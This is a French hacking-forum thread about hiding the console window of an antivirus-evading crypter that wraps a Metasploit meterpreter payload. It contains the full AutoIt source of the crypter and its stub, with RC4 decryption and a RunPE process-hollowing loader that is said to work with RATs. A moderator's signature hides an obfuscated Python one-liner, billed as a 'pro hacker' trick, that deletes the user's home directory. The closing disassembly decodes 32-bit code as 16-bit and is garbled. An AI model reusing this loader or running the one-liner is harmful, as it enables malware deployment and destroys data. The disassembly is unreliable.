Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 04-06-2013 22:09:18

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Cacher fenêtre cmd à l'execution d'un payload

Salut a tous, je fais beaucoup de recherches en ce moment pour trouver le meilleur FUD.

J'en ai trouver un pas mal mais j'ai un problème, quand je l'execute, j'ai un fenetre cmd qui s'ouvre et qui reste. Si je la ferme, mon meterpreter se coupe.

Pouvez-vous m'aider a cacher cette fenêtre?

Merci d'avance !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-06-2013 23:47:54

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Cacher fenêtre cmd à l'execution d'un payload

Il nous faut plus d'infos sur la façon dont tu génères ton payload (la ligne de commande Metasploit, au moins).

Suivant la "forme" sous laquelle tu génères ton Meterpreter, tu peux (ou pas) modifier son code source pour cacher la fenêtre. Mais comme je l'ai dit, on manque de détails pour confirmer...

De mémoire il y a moyen de cacher cette fenêtre via une option (désactivée par défaut). Mais je retombe pas dessus pour l'instant hmm

Hors Ligne

#3 08-06-2013 20:27:35

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Tout d'abord je génère mon payload avec un script qui l'encode jusqu'à 20 fois. On trouve la description ici

Ensuite j'utilise dragon autoit m3, c'est un crypter qui fait des merveilles (détectable à 3/46) mais le seul inconvénient c'est que la fenêtre cmd reste ouverte. J'aurai bien mi mon payload pour que tu puisses l'analyser mais je pense que pour des raisons de sécurité il vaut mieux éviter.

Merci de ta réponse Antares145 smile

Hors Ligne

#4 09-06-2013 10:53:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Cacher fenêtre cmd à l'execution d'un payload

Lis donc ceci, tu apprendras des choses : On the Infeasibility of Modeling Polymorphic Shellcode


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 12-06-2013 06:07:09

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

Une question toute bete me viens a l'esprit, est-ce que cette fenetre cmd apparait si tu n'utilises pas cette obfuscateur Autoit ? si oui utilise un autre payload... cest le plus simple...

Edit: J'ai eut un probleme similaire avec le payload vncinject, la solution était simple pourtant,
une ligne de code dans le .rb Enlever la fenetre cmd lors de l'execution du payload vnc

Dernière modification par JeanCharles (12-06-2013 06:46:10)


« γνωθι σεαυτον »

Hors Ligne

#6 12-06-2013 08:55:18

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Cacher fenêtre cmd à l'execution d'un payload

Ah, et le «Fully intetectable» c'est du mensonge.
Premièrement, «vanish» ne sert à rien. Un antivirus capable de détécter shikata na gai détectera N combinaisons de shikata na gai car ça reste du shikata na gai.

Et Dragon AutoIt, impossible de trouver les sources, si quelqu'un y parvient je suis intéressé. Ça m'a l'air d'être un piège à noob.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 12-06-2013 09:27:09

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

C'est vrai que Vanish ne sert a rien mais je l'utilise car il crée un payload et un listener rapidement et facilement.

Concernant Dragon Autoit, j'ai vu quelques vidéo dessus, au début j'ai un fichier en .au3 que je dois modifier. Il y a une ligne "KEY" et je remplace cette ligne pas un mot de passe assez long.
Il me donne un nouveau fichier .exe et je glisse mon meterpreter dedans, et il ressort en un nouvelle fichier à 3/45 sur virus total.

Merci pour ton lien spawn, je me pencherai dessus quand j'aurai un peu plus de temps.

@JeanCharles, effectivement quand je n'utilise pas Autoit, aucune fenetre ne s'affiche. Je ne sais pas en quoi consiste le payload vncinject, je vais faire quelques recherche pour en savoir plus. Merci à toi !

Hors Ligne

#8 12-06-2013 10:10:36

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

spawn a écrit :

Et Dragon AutoIt, impossible de trouver les sources, si quelqu'un y parvient je suis intéressé.

plus_un

Anthonyy59 a écrit :

au début j'ai un fichier en .au3 que je dois modifier.

envois le fichier .au3, quelqu'un trouvera la ligne qui nous interesse ici wink
Si tu ne modifie pas quelques lignes dans le code source de ce crypter, il te balancera toujours cette fenetre cmd...
je ne suis pas caller en autoit, mais bon apparement cest tres simple...


« γνωθι σεαυτον »

Hors Ligne

#9 12-06-2013 10:47:38

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Dragon-AutoIt-M3-SRC.rar

J'ai mi les 2 fichiers en .au3 dans un fichier .rar car ce sont des extensions non autorisées pour le forum. Le 2ème est le stub, je ne pense pas que nous en avons besoin pour meterpreter mais je l'ai quand même mit avec.

J'ai mi une image pour vous montrer la ligne que j'ai modifié moi même:

code.png

Et un petit lien de la vidéo où j'ai trouvé ce crypter : ici

Hors Ligne

#10 12-06-2013 11:14:53

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

Dragon AutoIt M3.au3

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Run_Obfuscator=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <WinAPI.au3>

;==============================================;
; Dragon AutoIt Simple Crypter M3              ;
; Coded By M3                                  ;
; For  Http://www.hackcommunity.com/           ;
;==============================================;


#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Dragon Autoit Crypter M3", 365, 168, -1, -2 ,-1,$WS_EX_ACCEPTFILES)
GUISetOnEvent($GUI_EVENT_DROPPED, "sDragAndDrop")
GUISetCursor (3)
GUISetFont(8, 400, 0, "Cambria")
GUISetBkColor(0x000000)
WinSetOnTop($Form1, "", 1)
$Text1 = GUICtrlCreateInput("Drag And Drop ....", 8, 118, 350, 16)
GUICtrlSetState(-1, $GUI_DROPACCEPTED)
GUISetState(@SW_SHOW)
GUICtrlSetCursor (-1, 3)
$Text2 = GUICtrlCreateInput("<<<<<  Pass  >>>>>", 8, 147, 100, 16)
GUICtrlSetCursor (-1, 3)
$Crypt = GUICtrlCreateButton("Encryptar", 115, 145, 120, 20)
GUICtrlSetCursor (-1, 3)
$AboutSoftware = GUICtrlCreateButton("Acerca De", 240, 145, 120, 20)
GUICtrlSetCursor (-1, 3)
$sProgressBar = GUICtrlCreateProgress(8, 137, 350, 6)
$sImage = GUICtrlCreatePic("AutoItCliente.jpg", 0, 0, 393, 113)
#EndRegion ### END Koda GUI section ###




    ;Simple Form Efect

	$Long = 1
	Do

	  _WinAPI_SetWindowRgn($Form1, _WinAPI_CreateRoundRectRgn(0, 0, 560 , $Long , 0 ,  0))
	  Sleep(1)
	  $Long = $Long + 1

	Until $Long = 200





    While 1


	     $nMsg = GUIGetMsg()
	     Switch $nMsg



	     Case $GUI_EVENT_CLOSE
	     Exit




	     Case $AboutSoftware

	     Msgbox (64,"AutoIt Crypter M3" ,"Coded By  M3 , Thanks to TranceXX")




	     Case $Crypt


	     If GuiCtrlRead($Text1) = "Drag and Drop your file ...." then
	     Msgbox(0,"Atention ","First Drag and Drop your File")
	     Exit
         Endif




		 FileWrite (@ScriptDir & "\Stub.exe", GuiCtrlRead($Text2))

         $sKey = "\\aGHmXLSed8OC5I3Z4q8XNqavKSYk01ErFPmo2i1DZz3TdDu1PDjWYI2eOd0yr9LlbtOxidqPcVS6tXO7dBK35e2jv5kf\\"

		 $stub = FileOpen(@ScriptDir & "\Stub.exe")

		 $sStub = FileRead($stub)

		 $sArquive = FileRead(FileOpen(GuiCtrlRead($Text1)))

		 $sArquive = _RC4($sArquive,$sKey)

         $salvar = FileOpen(FileSaveDialog("Save File", @ScriptDir, "PE Files(*.exe)") & ".exe", 18)

         FileWrite($salvar, $sStub)

		 FileWrite($salvar, StringToBinary($sKey))

		 FileWrite($salvar, $sArquive)

		 FileClose($stub)

		 FileClose($Text1)

		 Fileclose($Salvar)


         GUICtrlSetData ($sProgressBar,GUICtrlRead($sProgressBar) + 100)



	    EndSwitch

    WEnd






	Func sDragAndDrop()

		ConsoleWrite("ID: " & @GUI_DRAGID & " File: " & @GUI_DRAGFILE & " Drop: " & @GUI_DROPID & @CRLF)

	EndFunc





    Func _RC4($Data, $key)


  	   Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
	   Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
	   DllStructSetData($CodeBuffer, 1, $OPCODE)
	   Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
	   DllStructSetData($Buffer, 1, $Data)
	   DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $key, "int", 0)
	   Local $Ret = DllStructGetData($Buffer, 1)
	   $Buffer = 0
	   $CodeBuffer = 0
	   Return $Ret


    EndFunc

Stub.au3

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Run_Obfuscator=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

;==============================================;
; Dragon AutoIt Crypter M3                     ;
; Coded By M3                                  ;
; Thanks to TRANCEXX for RunPe                 ;
; Keep Credits if you Using Source             ;
;==============================================;

	SubMain()


	Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $sKey = "\\aGHmXLSed8OC5I3Z4q8XNqavKSYk01ErFPmo2i1DZz3TdDu1PDjWYI2eOd0yr9LlbtOxidqPcVS6tXO7dBK35e2jv5kf\\"
	  $AppExe = $sAppPath
	  $sArquive = FileRead($sAppPath)
	  $sParams = StringInstr($sArquive, $sKey)
	  $sLen = $sParams + sLenEx ($sKey)
	  $sArquive = StringMid($sArquive,  $sLen)
	  Call (_RunPE(_RC4($sArquive, $sKey)))

    EndFunc




	Func _RC4($Data, $key)


  	   Local $sOpcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
	   Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($sOpcode) & "]")
	   DllStructSetData($CodeBuffer, 1, $sOpcode)
	   Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
	   DllStructSetData($Buffer, 1, $Data)
	   DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $key, "int", 0)
	   Local $Ret = DllStructGetData($Buffer, 1)
	   $Buffer = 0
	   $CodeBuffer = 0
	   Return $Ret


    EndFunc




    Func sLenEx($sStr)

	   Local $Result , $i , $bLen
	   Do
	   $i = $i + 1
	   $bLen = StringLeft($sStr, $i)
	   $Result = $i
	   Until  $sStr = $bLen
	   Return $Result

    EndFunc




    Func _RunPE($BBINARYIMAGE)

	; RunPe
	; Compatible with RATs >>  Cybergate | SpyNet | Poyson Ivy | DarkCommet
	Local $BBINARY = Binary($BBINARYIMAGE)
    Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
    DllStructSetData($TBINARY, 1, $BBINARY)
    Local $PPOINTER = DllStructGetPtr($TBINARY)
    Local $TSTARTUPINFO = DllStructCreate("dword  cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
    Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
    Local $ACALL = DllCall("Kernel32", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
    Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
    Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
    Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
    DllStructSetData($TCONTEXT, "ContextFlags", 65538)
    $ACALL = DllCall("Kernel32", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
    Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
    $PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
    Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
    If Not ($SMAGIC == "MZ") Then
    DllCall("Kernel32", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
    Return SetError(3, 0, 0)
    EndIf
    Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
    $PPOINTER += 4
    If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
    DllCall("Kernel32", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
    Return SetError(4, 0, 0)
    EndIf
    Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
    Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
    $PPOINTER += 20
    Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
    $PPOINTER += 96
    Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
    If $IMAGIC <> 267 Then
    DllCall("Kernel32", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
    Return SetError(5, 0, 0)
    EndIf
    Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
    $PPOINTER += 128
    Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
    Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
    $ACALL = DllCall("Ntdll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
    $ACALL = DllCall("Kernel32", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
    Local $PREMOTECODE = $ACALL[0]
    Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
    Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
    $ACALL = DllCall("Kernel32", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
    Local $TIMAGE_SECTION_HEADER
    Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
    Local $IVIRTUALADDRESS
    For $I = 1 To $INUMBEROFSECTIONS
    $TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
    $ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
    $PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
    $IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
    If $ISIZEOFRAWDATA Then
    $ACALL = DllCall("Kernel32", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
    EndIf
    $PPOINTER += 40
    Next
    DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
    $ACALL = DllCall("Kernel32", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
    $ACALL = DllCall("Kernel32", "int", "ResumeThread", "ptr", $HTHREAD)
    EndFunc 

Bon bah, c'est pas si simple enfait lol, Je ne suis pas en mesure de t'aider, ni de l'utiliser n'ayant pas windows, mais j'espere que quelqu'un t'aidera et trouvera les lignes a ajouter en autoit, ou à enlever qui sait...

Edit: Si tu es vraimment determiné, tu peux toujours aller faire un tour ici tu trouveras surement quelqu'un qui vas t'éclairer, mais bonne chance pour l'approche...

Dernière modification par JeanCharles (12-06-2013 12:20:23)


« γνωθι σεαυτον »

Hors Ligne

#11 12-06-2013 20:59:04

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

Pas de soucis ! Je pense qu'il y aura quelques "vétérans" qui pourront m'éclairer !
Si je n'ai toujours pas de réponses j'irai directement leur demander sur leur forum grâce à ton lien, merci beaucoup !

Hors Ligne

#12 13-06-2013 09:36:21

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

Merci bcp a toi d'avoir partager tes sources smile aprés... le "tout cuit" ça n"éclaire pas vraimment, j'ai envie de dire... Il vaut mieux apprendre quelques bases en programation et dévelloper son "bon sens" pour "supervisé" les fonctions principales d'un code...
meme avec aucune connaissance en autoit, avec du bon sens tu dois pouvoir retrouver la ligne qui t'interesse...
PS: je n'ai pas pus avoir cette fenetre cmd devant mon ecran, mais elle dois forcement avoir un nom et correspondre avec une ligne du code, donc en se creusant un peu la tete et avec deux trois recherches, tu pourrais presque ten sortir tout seul, si tu vises bien wink ...c'est beaucoup plus enrichissant que d'aller voir le premier de la classe pour qu'il fasse tes devoirs de maths...


« γνωθι σεαυτον »

Hors Ligne

#13 13-06-2013 10:42:09

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Cacher fenêtre cmd à l'execution d'un payload

C'est sûr qu'il n'y a rien de mieux que son propre crypter, je me pencherai sur la question après ce fameux bac..
J'ai remarqué un petit truc, quand je ferme le cmd, la session meterpreter se coupe. Mais si je migre sur le port de explorer.exe, et là, même si je ferme cette fenêtre, la sessions meterpreter continue a fonctionner.

Je devrai faire fonctionner l'AutoRunScript migrate2 explorer.exe
Mais a voir comment on fait maintenant !

Hors Ligne

#14 13-06-2013 11:34:08

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : Cacher fenêtre cmd à l'execution d'un payload

C'est bien de vouloir tout automatisé smile Ya de l'avenir chez iphone et android pour ça... 
Mais le bac ca me fait bien rire smile C'est mieu d'enquiller les compétences et formations si tu es motivé smile
en 2 mois tu peux obtenir un statut "Concepteur développeur informatique" niveau II (equivalent bac+4+5)
a l'AFPA par exemple, juste avec des bases en HTML et SQL... et rien ne t'empeches d'enchainé sur d'autres compétences en quelques mois... Vas falloir que je m'y mette aussi...MDRR


« γνωθι σεαυτον »

Hors Ligne

#15 13-06-2013 13:09:48

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Cacher fenêtre cmd à l'execution d'un payload

Ok, c'est juste un wrapper de fichier.

Il produit un .exe qui déchiffre une de ses sections (qui contient ton premier .exe, chiffré avec RC4 et ta clef), et l'éxécute car c'est un PE valide, d'où

Func _RunPE($BBINARYIMAGE)

où $BBINARYIMAGE est le cleartext de la section chiffrée (ton premier .exe).

Utiliser RC4 (un vrai algorithme de chiffrement) est cohérent, mais un antivirus qui voit un éxécutable qui se dit :
- Coucou je peux déchiffrer un morceau de moi même chiffré avec RC4
- Coucou je vais même éxécuter cette partie
Va probablement hurler.

Sauf que l'éxécution d'un .exe embarqué est super courante, et est utilisée par exemple dans les jeux.exe, qui contiennent une version x86, une version 32 bits et les dll associées, le tout dans un gros .exe.

Tu ferais mieux d'utiliser RC4 comme un grand.

Cadeau : le bytecode pour déchiffrer :

Local $sOpcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"

Ce qui nous donne :

00000000  C8100100          enter 0x110,0x0
00000004  6A00              push byte +0x0
00000006  6A00              push byte +0x0
00000008  53                push bx
00000009  56                push si
0000000A  57                push di
0000000B  8B5510            mov dx,[di+0x10]
0000000E  31C9              xor cx,cx
00000010  89C8              mov ax,cx
00000012  49                dec cx
00000013  89D7              mov di,dx
00000015  F2AE              repne scasb
00000017  48                dec ax
00000018  48                dec ax
00000019  29C8              sub ax,cx
0000001B  8945F0            mov [di-0x10],ax
0000001E  85C0              test ax,ax
00000020  0F84DC00          jz word 0x100
00000024  0000              add [bx+si],al
00000026  B90001            mov cx,0x100
00000029  0000              add [bx+si],al
0000002B  88C8              mov al,cl
0000002D  2C01              sub al,0x1
0000002F  88840DEF          mov [si-0x10f3],al
00000033  FE                db 0xfe
00000034  FF                db 0xff
00000035  FFE2              jmp dx
00000037  F38365F400        rep and word [di-0xc],byte +0x0
0000003C  8365FC00          and word [di-0x4],byte +0x0
00000040  817DFC0001        cmp word [di-0x4],0x100
00000045  0000              add [bx+si],al
00000047  7D47              jnl 0x90
00000049  8B45FC            mov ax,[di-0x4]
0000004C  31D2              xor dx,dx
0000004E  F775F0            div word [di-0x10]
00000051  92                xchg ax,dx
00000052  034510            add ax,[di+0x10]
00000055  0FB600            movzx ax,[bx+si]
00000058  8B4DFC            mov cx,[di-0x4]
0000005B  0FB68C0DF0        movzx cx,[si-0xff3]
00000060  FE                db 0xfe
00000061  FF                db 0xff
00000062  FF01              inc word [bx+di]
00000064  C80345F4          enter 0x4503,0xf4
00000068  25FF00            and ax,0xff
0000006B  0000              add [bx+si],al
0000006D  8945F4            mov [di-0xc],ax
00000070  8B75FC            mov si,[di-0x4]
00000073  8A8435F0          mov al,[si-0xfcb]
00000077  FE                db 0xfe
00000078  FF                db 0xff
00000079  FF8B7DF4          dec word [bp+di-0xb83]
0000007D  86843DF0          xchg al,[si-0xfc3]
00000081  FE                db 0xfe
00000082  FF                db 0xff
00000083  FF888435          dec word [bx+si+0x3584]
00000087  F0                lock
00000088  FE                db 0xfe
00000089  FF                db 0xff
0000008A  FF                db 0xff
0000008B  FF45FC            inc word [di-0x4]
0000008E  EBB0              jmp short 0x40
00000090  8D9DF0FE          lea bx,[di-0x110]
00000094  FF                db 0xff
00000095  FF31              push word [bx+di]
00000097  FF89FA39          dec word [bx+di+0x39fa]
0000009B  55                push bp
0000009C  0C76              or al,0x76
0000009E  638B85EC          arpl [bp+di-0x137b],cx
000000A2  FE                db 0xfe
000000A3  FF                db 0xff
000000A4  FF4025            inc word [bx+si+0x25]
000000A7  FF00              inc word [bx+si]
000000A9  0000              add [bx+si],al
000000AB  8985ECFE          mov [di-0x114],ax
000000AF  FF                db 0xff
000000B0  FF89D803          dec word [bx+di+0x3d8]
000000B4  85EC              test sp,bp
000000B6  FE                db 0xfe
000000B7  FF                db 0xff
000000B8  FF0F              dec word [bx]
000000BA  B600              mov dh,0x0
000000BC  0385E8FE          add ax,[di-0x118]
000000C0  FF                db 0xff
000000C1  FF25              jmp word [di]
000000C3  FF00              inc word [bx+si]
000000C5  0000              add [bx+si],al
000000C7  8985E8FE          mov [di-0x118],ax
000000CB  FF                db 0xff
000000CC  FF89DE03          dec word [bx+di+0x3de]
000000D0  B5EC              mov ch,0xec
000000D2  FE                db 0xfe
000000D3  FF                db 0xff
000000D4  FF8A0689          dec word [bp+si-0x76fa]
000000D8  DF03              fild word [bp+di]
000000DA  BDE8FE            mov bp,0xfee8
000000DD  FF                db 0xff
000000DE  FF860788          inc word [bp-0x77f9]
000000E2  06                push es
000000E3  0FB60E0FB6        movzx cx,[0xb60f]
000000E8  07                pop es
000000E9  01C1              add cx,ax
000000EB  81E1FF00          and cx,0xff
000000EF  0000              add [bx+si],al
000000F1  8A840DF0          mov al,[si-0xff3]
000000F5  FE                db 0xfe
000000F6  FF                db 0xff
000000F7  FF8B7508          dec word [bp+di+0x875]
000000FB  01D6              add si,dx
000000FD  300642EB          xor [0xeb42],al
00000101  98                cbw
00000102  5F                pop di
